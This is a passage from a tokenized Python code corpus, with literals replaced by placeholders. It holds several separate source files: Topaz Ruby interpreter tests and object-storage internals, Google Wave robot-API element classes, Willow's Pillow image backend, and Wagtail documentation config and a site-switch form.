execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_to_a ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT:abc>" , "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] <EOL> def test_values_at ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT:X>" , "<STR_LIT>" ] <EOL> def test_branch ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> def test_dot ( self , space ) : <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert w_res is space . w_nil <EOL> w_res = space . execute ( '<STR_LIT>' ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> <EOL> def test_non_capturing_group ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT:bar>" ] <EOL> def test_optional_group ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT:foo>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == "<STR_LIT:bar>" <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) is None <EOL> def test_quantify_set ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:2> <EOL> def test_posix_class ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:3> <EOL> def test_quantify ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . unwrap ( space , w_res ) == [ "<STR_LIT>" ] <EOL> def test_repeated_quantification ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert self . 
unwrap ( space , w_res ) == [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def test_casefoldp ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_false <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> def test_eqeqeq ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_true <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert w_res is space . w_false <EOL> def test_escape ( self , space ) : <EOL> w_res = space . execute ( """<STR_LIT>""" ) <EOL> assert space . str_w ( w_res ) == "<STR_LIT>" <EOL> def test_ignore_whitespace ( self , space ) : <EOL> w_res = space . execute ( "<STR_LIT>" ) <EOL> assert space . int_w ( w_res ) == <NUM_LIT:0> </s>
<s> from rpython . rlib import jit , longlong2float <EOL> from rpython . rlib . objectmodel import specialize <EOL> from rpython . rlib . rarithmetic import intmask <EOL> from rpython . rlib . unroll import unrolling_iterable <EOL> from rpython . rtyper . lltypesystem import rffi , lltype <EOL> NUM_DIGITS = <NUM_LIT:4> <EOL> NUM_DIGITS_POW2 = <NUM_LIT:1> << NUM_DIGITS <EOL> class MapTransitionCache ( object ) : <EOL> def __init__ ( self , space ) : <EOL> self . class_nodes = { } <EOL> self . transitions = { } <EOL> @ jit . elidable <EOL> def get_class_node ( self , w_cls ) : <EOL> return self . class_nodes . setdefault ( w_cls , ClassNode ( w_cls ) ) <EOL> @ jit . elidable <EOL> def get_transition ( self , prev , node_cls , name ) : <EOL> return self . transitions . setdefault ( ( prev , node_cls , name ) , node_cls ( prev , name ) ) <EOL> class BaseNode ( object ) : <EOL> _attrs_ = [ "<STR_LIT>" ] <EOL> _immutable_fields_ = [ "<STR_LIT>" ] <EOL> @ jit . elidable <EOL> def find ( self , node_cls , name = None ) : <EOL> node = self <EOL> while node is not None : <EOL> if node . matches ( node_cls , name ) : <EOL> return node <EOL> node = node . getprev ( ) <EOL> def matches ( self , node_cls , name ) : <EOL> return isinstance ( self , node_cls ) <EOL> def add ( self , space , node_cls , name , w_obj ) : <EOL> new_node = space . fromcache ( MapTransitionCache ) . get_transition ( self , node_cls , name ) <EOL> new_node . update_storage_size ( w_obj , self ) <EOL> return new_node <EOL> class ClassNode ( BaseNode ) : <EOL> _immutable_fields_ = [ "<STR_LIT>" ] <EOL> uses_object_storage = uses_unboxed_storage = False <EOL> def __init__ ( self , w_cls ) : <EOL> self . w_cls = w_cls <EOL> self . size_estimate = SizeEstimate ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def getclass ( self ) : <EOL> return self . w_cls <EOL> def change_class ( self , space , new_cls ) : <EOL> return space . fromcache ( MapTransitionCache ) . 
get_class_node ( new_cls ) <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> pass <EOL> def getprev ( self ) : <EOL> return None <EOL> class StorageNode ( BaseNode ) : <EOL> _immutable_fields_ = [ "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" ] <EOL> def __init__ ( self , prev , name ) : <EOL> self . prev = prev <EOL> self . name = name <EOL> self . pos = self . compute_position ( ) <EOL> def length ( self ) : <EOL> return self . pos + <NUM_LIT:1> <EOL> def getprev ( self ) : <EOL> return self . prev <EOL> def change_class ( self , space , w_cls ) : <EOL> new_prev = self . prev . change_class ( space , w_cls ) <EOL> return space . fromcache ( MapTransitionCache ) . get_transition ( new_prev , self . __class__ , self . name ) <EOL> def matches ( self , node_cls , name ) : <EOL> return BaseNode . matches ( self , node_cls , name ) and name == self . name <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> if not jit . we_are_jitted ( ) : <EOL> prev_node . size_estimate . update_from ( self . size_estimate ) <EOL> class AttributeNode ( StorageNode ) : <EOL> @ staticmethod <EOL> def select_type ( space , w_value ) : <EOL> for cls in ATTRIBUTE_CLASSES : <EOL> if cls . correct_type ( space , w_value ) : <EOL> return cls <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> self . prev . copy_attrs ( space , w_obj , w_target ) <EOL> w_target . set_instance_var ( space , self . name , self . read ( space , w_obj ) ) <EOL> def write ( self , space , w_obj , w_value ) : <EOL> if not self . correct_type ( space , w_value ) : <EOL> w_obj . map = w_obj . map . remove_attr ( space , self , w_obj ) <EOL> w_obj . map = node = w_obj . map . add ( space , AttributeNode . select_type ( space , w_value ) , self . name , w_obj ) <EOL> node . write ( space , w_obj , w_value ) <EOL> else : <EOL> self . _store ( space , w_obj , w_value ) <EOL> def remove_attr ( self , space , node , w_obj ) : <EOL> if node is self : <EOL> return self . 
prev <EOL> w_cur_val = self . read ( space , w_obj ) <EOL> new_prev = self . prev . remove_attr ( space , node , w_obj ) <EOL> node = new_prev . add ( space , AttributeNode . select_type ( space , w_cur_val ) , self . name , w_obj ) <EOL> node . write ( space , w_obj , w_cur_val ) <EOL> return node <EOL> class UnboxedAttributeNode ( AttributeNode ) : <EOL> uses_object_storage = False <EOL> uses_unboxed_storage = True <EOL> def __init__ ( self , prev , name ) : <EOL> AttributeNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> prev . size_estimate . _object_size_estimate , <EOL> self . length ( ) * NUM_DIGITS_POW2 <EOL> ) <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> AttributeNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT>" , <NUM_LIT:0.0> ) <EOL> class IntAttributeNode ( UnboxedAttributeNode ) : <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return space . is_kind_of ( w_value , space . w_fixnum ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . unboxed_storage [ self . pos ] = longlong2float . longlong2float ( rffi . cast ( lltype . SignedLongLong , space . int_w ( w_value ) ) ) <EOL> def read ( self , space , w_obj ) : <EOL> return space . newint ( intmask ( longlong2float . float2longlong ( w_obj . unboxed_storage [ self . pos ] ) ) ) <EOL> class FloatAttributeNode ( UnboxedAttributeNode ) : <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return space . is_kind_of ( w_value , space . w_float ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . unboxed_storage [ self . pos ] = space . float_w ( w_value ) <EOL> def read ( self , space , w_obj ) : <EOL> return space . newfloat ( w_obj . unboxed_storage [ self . 
pos ] ) <EOL> class ObjectAttributeNode ( AttributeNode ) : <EOL> uses_object_storage = True <EOL> uses_unboxed_storage = False <EOL> def __init__ ( self , prev , name ) : <EOL> AttributeNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> self . length ( ) * NUM_DIGITS_POW2 , <EOL> prev . size_estimate . _unboxed_size_estimate , <EOL> ) <EOL> @ staticmethod <EOL> def correct_type ( space , w_value ) : <EOL> return True <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> AttributeNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT:object>" , None ) <EOL> def _store ( self , space , w_obj , w_value ) : <EOL> w_obj . object_storage [ self . pos ] = w_value <EOL> def read ( self , space , w_obj ) : <EOL> return w_obj . object_storage [ self . pos ] <EOL> class FlagNode ( StorageNode ) : <EOL> uses_object_storage = True <EOL> uses_unboxed_storage = False <EOL> def __init__ ( self , prev , name ) : <EOL> StorageNode . __init__ ( self , prev , name ) <EOL> self . size_estimate = SizeEstimate ( <EOL> self . length ( ) * NUM_DIGITS_POW2 , <EOL> prev . size_estimate . _unboxed_size_estimate , <EOL> ) <EOL> def compute_position ( self ) : <EOL> return compute_position ( self , "<STR_LIT>" ) <EOL> def update_storage_size ( self , w_obj , prev_node ) : <EOL> StorageNode . update_storage_size ( self , w_obj , prev_node ) <EOL> update_storage ( self , w_obj , "<STR_LIT:object>" , None ) <EOL> def copy_attrs ( self , space , w_obj , w_target ) : <EOL> self . prev . copy_attrs ( space , w_obj , w_target ) <EOL> def write ( self , space , w_obj , w_value ) : <EOL> w_obj . object_storage [ self . pos ] = w_value <EOL> def read ( self , space , w_obj ) : <EOL> return w_obj . object_storage [ self . 
pos ] <EOL> ATTRIBUTE_CLASSES = unrolling_iterable ( [ <EOL> IntAttributeNode , <EOL> FloatAttributeNode , <EOL> ObjectAttributeNode , <EOL> ] ) <EOL> @ specialize . arg ( <NUM_LIT:2> ) <EOL> @ jit . unroll_safe <EOL> def update_storage ( node , w_obj , storage_name , empty_value ) : <EOL> storage = getattr ( w_obj , storage_name + "<STR_LIT>" ) <EOL> if storage is None or node . length ( ) >= len ( storage ) : <EOL> new_storage = [ empty_value ] * getattr ( node . size_estimate , storage_name + "<STR_LIT>" ) ( ) <EOL> if storage is not None : <EOL> for i , value in enumerate ( storage ) : <EOL> new_storage [ i ] = value <EOL> setattr ( w_obj , storage_name + "<STR_LIT>" , new_storage ) <EOL> @ specialize . arg ( <NUM_LIT:1> ) <EOL> def compute_position ( node , predicate ) : <EOL> node = node . getprev ( ) <EOL> n = <NUM_LIT:0> <EOL> while node is not None : <EOL> if getattr ( node , predicate ) : <EOL> n += <NUM_LIT:1> <EOL> node = node . getprev ( ) <EOL> return n <EOL> class SizeEstimate ( object ) : <EOL> def __init__ ( self , object_size_estimate , unboxed_size_estimate ) : <EOL> self . _object_size_estimate = object_size_estimate <EOL> self . _unboxed_size_estimate = unboxed_size_estimate <EOL> @ jit . elidable <EOL> def object_size_estimate ( self ) : <EOL> return self . _object_size_estimate >> NUM_DIGITS <EOL> @ jit . elidable <EOL> def unboxed_size_estimate ( self ) : <EOL> return self . _unboxed_size_estimate >> NUM_DIGITS <EOL> def update_from ( self , other ) : <EOL> self . _object_size_estimate = self . _object_size_estimate + other . object_size_estimate ( ) - self . object_size_estimate ( ) <EOL> self . _unboxed_size_estimate = self . _unboxed_size_estimate + other . unboxed_size_estimate ( ) - self . unboxed_size_estimate ( ) </s>
<s> from topaz . module import ClassDef <EOL> from topaz . objects . objectobject import W_Object <EOL> def create_owner ( classdef ) : <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_owner ( self , space ) : <EOL> return self . w_owner <EOL> return method_owner <EOL> def create_to_s ( classdef ) : <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_to_s ( self , space ) : <EOL> return space . newstr_fromstr ( <EOL> "<STR_LIT>" % ( classdef . name , self . w_owner . name , self . w_function . name ) <EOL> ) <EOL> return method_to_s <EOL> class W_MethodObject ( W_Object ) : <EOL> classdef = ClassDef ( "<STR_LIT>" , W_Object . classdef ) <EOL> def __init__ ( self , space , w_owner , w_function , w_receiver ) : <EOL> W_Object . __init__ ( self , space ) <EOL> self . w_owner = w_owner <EOL> self . w_function = w_function <EOL> self . w_receiver = w_receiver <EOL> method_allocate = classdef . undefine_allocator ( ) <EOL> method_owner = create_owner ( classdef ) <EOL> method_to_s = create_to_s ( classdef ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_call ( self , space , args_w , block ) : <EOL> return space . invoke_function ( <EOL> self . w_function , <EOL> self . w_receiver , <EOL> args_w , <EOL> block <EOL> ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_unbind ( self , space ) : <EOL> return W_UnboundMethodObject ( space , self . w_owner , self . w_function ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_receiver ( self , space ) : <EOL> return self . w_receiver <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_eql ( self , space , w_other ) : <EOL> if isinstance ( w_other , W_MethodObject ) : <EOL> return space . newbool ( <EOL> self . w_function is w_other . w_function and self . w_receiver is w_other . w_receiver <EOL> ) <EOL> else : <EOL> return space . w_false <EOL> @ classdef . 
method ( "<STR_LIT>" ) <EOL> def method_arity ( self , space ) : <EOL> return self . w_function . arity ( space ) <EOL> class W_UnboundMethodObject ( W_Object ) : <EOL> classdef = ClassDef ( "<STR_LIT>" , W_Object . classdef ) <EOL> def __init__ ( self , space , w_owner , w_function ) : <EOL> W_Object . __init__ ( self , space ) <EOL> self . w_owner = w_owner <EOL> self . w_function = w_function <EOL> method_allocator = classdef . undefine_allocator ( ) <EOL> method_owner = create_owner ( classdef ) <EOL> method_to_s = create_to_s ( classdef ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_bind ( self , space , w_receiver ) : <EOL> if not self . w_owner . is_ancestor_of ( space . getclass ( w_receiver ) ) : <EOL> raise space . error ( space . w_TypeError , <EOL> "<STR_LIT>" % self . w_owner . name <EOL> ) <EOL> else : <EOL> return W_MethodObject ( space , self . w_owner , self . w_function , w_receiver ) <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_eql ( self , space , w_other ) : <EOL> if isinstance ( w_other , W_UnboundMethodObject ) : <EOL> return space . newbool ( self . w_function is w_other . w_function ) <EOL> else : <EOL> return space . w_false <EOL> @ classdef . method ( "<STR_LIT>" ) <EOL> def method_arity ( self , space ) : <EOL> return self . w_function . arity ( space ) </s>
<s> from rpython . rtyper . lltypesystem import rffi <EOL> def make_string_packer ( padding = "<STR_LIT:U+0020>" , nullterminated = False ) : <EOL> def pack_string ( space , packer , width ) : <EOL> try : <EOL> w_s = packer . args_w [ packer . args_index ] <EOL> except IndexError : <EOL> raise space . error ( space . w_ArgumentError , "<STR_LIT>" ) <EOL> string = space . str_w ( space . convert_type ( w_s , space . w_string , "<STR_LIT>" ) ) <EOL> if nullterminated : <EOL> packer . result += string <EOL> packer . result . append ( "<STR_LIT>" ) <EOL> else : <EOL> assert width >= <NUM_LIT:0> <EOL> string = string [ : width ] <EOL> packer . result += string <EOL> packer . result . extend ( [ padding ] * ( width - len ( string ) ) ) <EOL> packer . args_index += <NUM_LIT:1> <EOL> return pack_string <EOL> def pack_pointer ( space , packer , repetitions ) : <EOL> if repetitions > len ( packer . args_w ) - packer . args_index : <EOL> raise space . error ( space . w_ArgumentError , "<STR_LIT>" ) <EOL> for i in xrange ( repetitions ) : <EOL> for i in xrange ( packer . args_index , repetitions + packer . args_index ) : <EOL> packer . result . extend ( [ "<STR_LIT>" ] * rffi . sizeof ( rffi . INTPTR_T ) ) <EOL> packer . args_index += repetitions </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import util <EOL> class Range ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , start = <NUM_LIT:0> , end = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . start = start <EOL> self . end = end <EOL> if self . end - self . start < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + str ( self . start ) + '<STR_LIT:U+002CU+0020>' + str ( self . end ) + '<STR_LIT:)>' <EOL> def IsCollapsed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . end == self . start <EOL> class Annotation ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , name , value , r = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . value = value <EOL> self . range = r or Range ( ) <EOL> ELEMENT_TYPE = util . StringEnum ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Element ( object ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , element_type , ** properties ) : <EOL> """<STR_LIT>""" <EOL> if len ( properties ) == <NUM_LIT:1> and '<STR_LIT>' in properties : <EOL> properties = properties [ '<STR_LIT>' ] <EOL> self . type = element_type <EOL> for key , val in properties . items ( ) : <EOL> setattr ( self , key , val ) <EOL> def Serialize ( self ) : <EOL> """<STR_LIT>""" <EOL> props = { } <EOL> data = { } <EOL> for attr in dir ( self ) : <EOL> if attr . startswith ( '<STR_LIT:_>' ) : <EOL> continue <EOL> val = getattr ( self , attr ) <EOL> if val is None or callable ( val ) : <EOL> continue <EOL> val = util . Serialize ( val ) <EOL> if attr == '<STR_LIT:type>' or attr == '<STR_LIT>' : <EOL> data [ attr ] = val <EOL> else : <EOL> props [ attr ] = val <EOL> data [ '<STR_LIT>' ] = util . 
Serialize ( props ) <EOL> return data <EOL> class FormElement ( Element ) : <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , element_type , name , value = '<STR_LIT>' , default_value = '<STR_LIT>' , label = '<STR_LIT>' ) : <EOL> super ( FormElement , self ) . __init__ ( element_type , <EOL> name = name , value = value , default_value = default_value , label = label ) <EOL> class Gadget ( Element ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , props = None ) : <EOL> if props is None : <EOL> props = { } <EOL> props [ '<STR_LIT:url>' ] = url <EOL> logging . info ( '<STR_LIT>' + str ( props ) ) <EOL> super ( Gadget , self ) . __init__ ( ELEMENT_TYPE . GADGET , properties = props ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , key ) : <EOL> return getattr ( self , key ) <EOL> else : <EOL> return default <EOL> def SubmitDelta ( self , delta ) : <EOL> """<STR_LIT>""" <EOL> for k , v in delta . items ( ) : <EOL> setattr ( self , k , v ) <EOL> class Image ( Element ) : <EOL> """<STR_LIT>""" <EOL> java_class = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , width = None , height = None , <EOL> attachment_id = None , caption = None ) : <EOL> super ( Image , self ) . __init__ ( ELEMENT_TYPE . IMAGE , url = url , width = width , <EOL> height = height , attachment_id = attachment_id , caption = caption ) <EOL> def ElementFromJson ( json ) : <EOL> """<STR_LIT>""" <EOL> etype = json [ '<STR_LIT:type>' ] <EOL> logging . info ( '<STR_LIT>' + str ( json ) ) <EOL> props = json [ '<STR_LIT>' ] . copy ( ) <EOL> if etype == ELEMENT_TYPE . GADGET : <EOL> url = props [ '<STR_LIT:url>' ] <EOL> del props [ '<STR_LIT:url>' ] <EOL> return Gadget ( url = url , props = props ) <EOL> elif etype == ELEMENT_TYPE . IMAGE : <EOL> return Image ( url = props . get ( '<STR_LIT:url>' , '<STR_LIT>' ) , <EOL> width = props . get ( '<STR_LIT:width>' ) , <EOL> height = props . 
get ( '<STR_LIT>' ) , <EOL> attachment_id = props . get ( '<STR_LIT>' ) , <EOL> caption = props . get ( '<STR_LIT>' ) ) <EOL> return FormElement ( element_type = etype , <EOL> name = props . get ( '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> value = props . get ( '<STR_LIT:value>' , '<STR_LIT>' ) , <EOL> default_value = props . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> label = props . get ( '<STR_LIT:label>' , '<STR_LIT>' ) ) </s>
<s> from __future__ import absolute_import <EOL> from willow . image import ( <EOL> Image , <EOL> JPEGImageFile , <EOL> PNGImageFile , <EOL> GIFImageFile , <EOL> BMPImageFile , <EOL> RGBImageBuffer , <EOL> RGBAImageBuffer , <EOL> ) <EOL> def _PIL_Image ( ) : <EOL> import PIL . Image <EOL> return PIL . Image <EOL> class PillowImage ( Image ) : <EOL> def __init__ ( self , image ) : <EOL> self . image = image <EOL> @ classmethod <EOL> def check ( cls ) : <EOL> _PIL_Image ( ) <EOL> @ Image . operation <EOL> def get_size ( self ) : <EOL> return self . image . size <EOL> @ Image . operation <EOL> def has_alpha ( self ) : <EOL> img = self . image <EOL> return img . mode in ( '<STR_LIT>' , '<STR_LIT>' ) or ( img . mode == '<STR_LIT:P>' and '<STR_LIT>' in img . info ) <EOL> @ Image . operation <EOL> def has_animation ( self ) : <EOL> return False <EOL> @ Image . operation <EOL> def resize ( self , size ) : <EOL> if self . image . mode in [ '<STR_LIT:1>' , '<STR_LIT:P>' ] : <EOL> if self . has_alpha ( ) : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image <EOL> return PillowImage ( image . resize ( size , _PIL_Image ( ) . ANTIALIAS ) ) <EOL> @ Image . operation <EOL> def crop ( self , rect ) : <EOL> return PillowImage ( self . image . crop ( rect ) ) <EOL> @ Image . operation <EOL> def save_as_jpeg ( self , f , quality = <NUM_LIT> ) : <EOL> if self . image . mode in [ '<STR_LIT:1>' , '<STR_LIT:P>' ] : <EOL> image = self . image . convert ( '<STR_LIT>' ) <EOL> else : <EOL> image = self . image <EOL> image . save ( f , '<STR_LIT>' , quality = quality ) <EOL> return JPEGImageFile ( f ) <EOL> @ Image . operation <EOL> def save_as_png ( self , f ) : <EOL> self . image . save ( f , '<STR_LIT>' ) <EOL> return PNGImageFile ( f ) <EOL> @ Image . operation <EOL> def save_as_gif ( self , f ) : <EOL> image = self . image <EOL> if image . 
mode not in [ '<STR_LIT:L>' , '<STR_LIT:P>' ] : <EOL> image = image . convert ( '<STR_LIT:P>' , palette = _PIL_Image ( ) . ADAPTIVE ) <EOL> if '<STR_LIT>' in image . info : <EOL> image . save ( f , '<STR_LIT>' , transparency = image . info [ '<STR_LIT>' ] ) <EOL> else : <EOL> image . save ( f , '<STR_LIT>' ) <EOL> return GIFImageFile ( f ) <EOL> @ Image . operation <EOL> def auto_orient ( self ) : <EOL> image = self . image <EOL> if hasattr ( image , '<STR_LIT>' ) : <EOL> try : <EOL> exif = image . _getexif ( ) <EOL> except Exception : <EOL> exif = None <EOL> if exif is not None : <EOL> orientation = exif . get ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> if <NUM_LIT:1> <= orientation <= <NUM_LIT:8> : <EOL> Image = _PIL_Image ( ) <EOL> ORIENTATION_TO_TRANSPOSE = { <EOL> <NUM_LIT:1> : ( ) , <EOL> <NUM_LIT:2> : ( Image . FLIP_LEFT_RIGHT , ) , <EOL> <NUM_LIT:3> : ( Image . ROTATE_180 , ) , <EOL> <NUM_LIT:4> : ( Image . ROTATE_180 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:5> : ( Image . ROTATE_270 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:6> : ( Image . ROTATE_270 , ) , <EOL> <NUM_LIT:7> : ( Image . ROTATE_90 , Image . FLIP_LEFT_RIGHT ) , <EOL> <NUM_LIT:8> : ( Image . ROTATE_90 , ) , <EOL> } <EOL> for transpose in ORIENTATION_TO_TRANSPOSE [ orientation ] : <EOL> image = image . transpose ( transpose ) <EOL> return PillowImage ( image ) <EOL> @ Image . operation <EOL> def get_pillow_image ( self ) : <EOL> return self . image <EOL> @ classmethod <EOL> @ Image . converter_from ( JPEGImageFile ) <EOL> @ Image . converter_from ( PNGImageFile ) <EOL> @ Image . converter_from ( GIFImageFile , cost = <NUM_LIT:200> ) <EOL> @ Image . converter_from ( BMPImageFile ) <EOL> def open ( cls , image_file ) : <EOL> image_file . f . seek ( <NUM_LIT:0> ) <EOL> image = _PIL_Image ( ) . open ( image_file . f ) <EOL> image . load ( ) <EOL> return cls ( image ) <EOL> @ Image . converter_to ( RGBImageBuffer ) <EOL> def to_buffer_rgb ( self ) : <EOL> image = self . image <EOL> if image . 
mode != '<STR_LIT>' : <EOL> image = image . convert ( '<STR_LIT>' ) <EOL> return RGBImageBuffer ( image . size , image . tobytes ( ) ) <EOL> @ Image . converter_to ( RGBAImageBuffer ) <EOL> def to_buffer_rgba ( self ) : <EOL> image = self . image <EOL> if image . mode != '<STR_LIT>' : <EOL> image = image . convert ( '<STR_LIT>' ) <EOL> return RGBAImageBuffer ( image . size , image . tobytes ( ) ) <EOL> willow_image_classes = [ PillowImage ] </s>
<s> import sys <EOL> import os <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from wagtail . wagtailcore import __version__ <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> import django <EOL> django . setup ( ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> if not on_rtd : <EOL> extensions . append ( '<STR_LIT>' ) <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = __version__ <EOL> release = __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> spelling_lang = '<STR_LIT>' <EOL> spelling_word_list_filename = '<STR_LIT>' <EOL> html_logo = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django import forms <EOL> from django . core . urlresolvers import reverse <EOL> from wagtail . wagtailcore . models import Site <EOL> class SiteSwitchForm ( forms . Form ) : <EOL> site = forms . ChoiceField ( choices = [ ] ) <EOL> class Media : <EOL> js = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> def __init__ ( self , current_site , model , ** kwargs ) : <EOL> initial_data = { '<STR_LIT>' : self . get_change_url ( current_site , model ) } <EOL> super ( SiteSwitchForm , self ) . __init__ ( initial = initial_data , ** kwargs ) <EOL> sites = [ ( self . get_change_url ( site , model ) , site ) <EOL> for site in Site . objects . all ( ) ] <EOL> self . fields [ '<STR_LIT>' ] . choices = sites <EOL> @ classmethod <EOL> def get_change_url ( cls , site , model ) : <EOL> return reverse ( '<STR_LIT>' , args = [ <EOL> model . _meta . app_label , model . _meta . model_name , site . pk ] ) </s>
